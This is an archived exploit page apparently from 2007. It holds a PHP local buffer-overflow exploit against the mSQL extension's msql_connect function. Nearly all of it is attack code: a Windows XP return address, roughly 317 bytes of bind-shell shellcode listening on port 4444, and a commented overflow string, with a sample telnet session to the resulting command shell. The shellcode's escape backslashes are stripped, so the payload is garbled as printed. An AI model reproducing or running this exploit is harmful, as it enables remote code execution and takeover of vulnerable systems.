Home / exploits phpmsql-local.txt
Posted on 09 August 2007
<?php /* Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1 telnet 192.168.2.32 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:apache> */ if(!function_exists('msql_connect')) { die('mSQL extension is not available'); } $ret = "xA3x3Dx92x7C"; #shell32.dll ->CALL EBP WindowsXP $shellcode= "xbdxdbxc6x38x8fxd9xc9xd9x74x24xf4x58x31xc9" . "xb1x51x83xc0x04x31x68x0ex03xb3xc8xdax7axbf" . "xbfxf1xc8xd7xb9xf9x2cxd8x5ax8dxbfx02xbfx1a" . "x7ax76x34x60x80xfex4bx76x01xb1x53x03x49x6d" . "x65xf8x3fxe6x51x75xbex16xa8x49x58x4ax4fx89" . "x2fx95x91xc0xddx98xd3x3ex29xa1x87xe4xfaxa0" . "xc2x6exa5x6ex0cx9ax3cxe5x02x17x4axa6x06xa6" . "xa7x5bx1bx23xbex37x47x2fxa0x04xb6x94x46x01" . "xfax1ax0cx55xf1xd1x62x49xa4x6dxc2x79xe8x19" . "x4dx37x1ax36x01x38xf4xa0xf1xa0x91x1fxc4x44" . "x15x13x1axcbx8dx2cx8ax9bxe6x3exd7x60xa9x3f" . "xfexc9xc0x25x99x74x3fxadx64x23xaaxacx97x1b" . "x42x68x6ex6ex3exddx8ex46x12xb1x23x35xc6x76" . "x97xfaxbbx87xc7x9ax53x69xb4x04xf7x00xa5x5d" . "x9fxb6x3cx2dxa7xe0xbfx1bx4dx1fx11xf6x6dxcf" . "xf9x5cx3cxdex10xcbxc0xc9xb0xa6xc1x26x5exad" . "x77x41xd6x7ax77x9bxb9xd0xd3x71xc5x08x48x11" . "xdexd1xa9x9bx77xdexe0x09x87xf0x6bxd8x13x96" . "x1bx7fxb1xdfx39x15x19x86xe8x26x10xdfx81xf2" . "xaaxfdx67x3bx5fxabx76xf9x8dx55xc4xd2x5ex24" . "xb3x12xcax9dxefx0bx7ex1fx5cxddx81xaaxe7x1d" . "xabx0fxbfxb3x05xfex6ex5exa7x51xc0xcbxf6xae" . "x32x9bx55x89xb6x92xf5xd6x6fx40x05xd7xa7x6a" . "x29xacx9fx68x49x76x7bx6ex98x24x7bx40x4dx38" . "x09x65xd1xebxf1xb0x12xdbx0ex3dxed"; // msql_connect(str_repeat('A',49422)."xebx02".$ret."x15B".$shellcode.""); ?>